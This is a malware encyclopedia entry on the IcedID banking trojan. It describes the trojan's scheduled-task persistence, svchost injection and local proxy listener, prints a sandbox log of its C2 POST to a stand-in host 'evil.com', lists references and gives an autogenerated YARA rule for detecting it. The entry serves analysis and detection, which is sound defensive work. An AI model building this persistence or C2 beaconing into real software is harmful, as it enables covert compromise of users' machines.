win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): Lunar Spider

URLhaus        

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/
https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/
https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html
https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites
https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766
https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/
https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/
https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/
https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/
https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid
https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html
https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html
https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html
https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html
https://www.youtube.com/watch?v=7Dk7NkIbVqY
https://www.youtube.com/watch?v=wObF9n2UIAM
Yara Rules
[TLP:WHITE] win_icedid_auto (20190620 | autogenerated rule brought to you by yara-signator)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2019-07-05"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator 0.2a"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_version = "20190620"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */

    strings:
        $sequence_0 = { d1c8 f7d0 d1c8 2d20010000 d1c0 f7d0 }
            // n = 6, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax

        $sequence_1 = { f7d0 d1c8 2d20010000 d1c0 f7d0 }
            // n = 5, score = 1200
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax

        $sequence_2 = { d1c8 f7d0 d1c8 2d20010000 d1c0 }
            // n = 5, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1

        $sequence_3 = { d1c8 2d20010000 d1c0 f7d0 }
            // n = 4, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax

        $sequence_4 = { d1c8 f7d0 d1c8 2d20010000 }
            // n = 4, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120

        $sequence_5 = { f7d0 d1c8 2d20010000 d1c0 }
            // n = 4, score = 1200
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1

        $sequence_6 = { d1c8 f7d0 d1c8 2d20010000 }
            // n = 4, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120

        $sequence_7 = { 74?? 6a3b 56 ff15???????? 8bf8 }
            // n = 5, score = 1100
            //   74??                 |                     
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax

        $sequence_8 = { be01000080 50 56 ff15???????? }
            // n = 4, score = 1100
            //   be01000080           | mov                 esi, 0x80000001
            //   50                   | push                eax
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_9 = { 73?? 33ed 396f18 76?? }
            // n = 4, score = 500
            //   73??                 |                     
            //   33ed                 | xor                 ebp, ebp
            //   396f18               | cmp                 dword ptr [edi + 0x18], ebp
            //   76??                 |                     

        $sequence_10 = { ff15???????? 85c0 75?? b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   75??                 |                     
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     

        $sequence_11 = { 8a4173 a808 75?? a804 }
            // n = 4, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75??                 |                     
            //   a804                 | test                al, 4

        $sequence_12 = { a808 75?? a804 74?? }
            // n = 4, score = 400
            //   a808                 | test                al, 8
            //   75??                 |                     
            //   a804                 | test                al, 4
            //   74??                 |                     

        $sequence_13 = { e8???????? eb?? 66893d???????? eb?? }
            // n = 4, score = 400
            //   e8????????           |                     
            //   eb??                 |                     
            //   66893d????????       |                     
            //   eb??                 |                     

        $sequence_14 = { ff5010 85c0 74?? 33c0 e9???????? }
            // n = 5, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   74??                 |                     
            //   33c0                 | xor                 eax, eax
            //   e9????????           |                     

        $sequence_15 = { 74?? 8a07 0fb6c0 03c1 }
            // n = 4, score = 400
            //   74??                 |                     
            //   8a07                 | mov                 al, byte ptr [edi]
            //   0fb6c0               | movzx               eax, al
            //   03c1                 | add                 eax, ecx

        $sequence_16 = { 8a4173 a808 75?? a804 74?? }
            // n = 5, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75??                 |                     
            //   a804                 | test                al, 4
            //   74??                 |                     

    condition:
        7 of them
}
Download all Yara Rules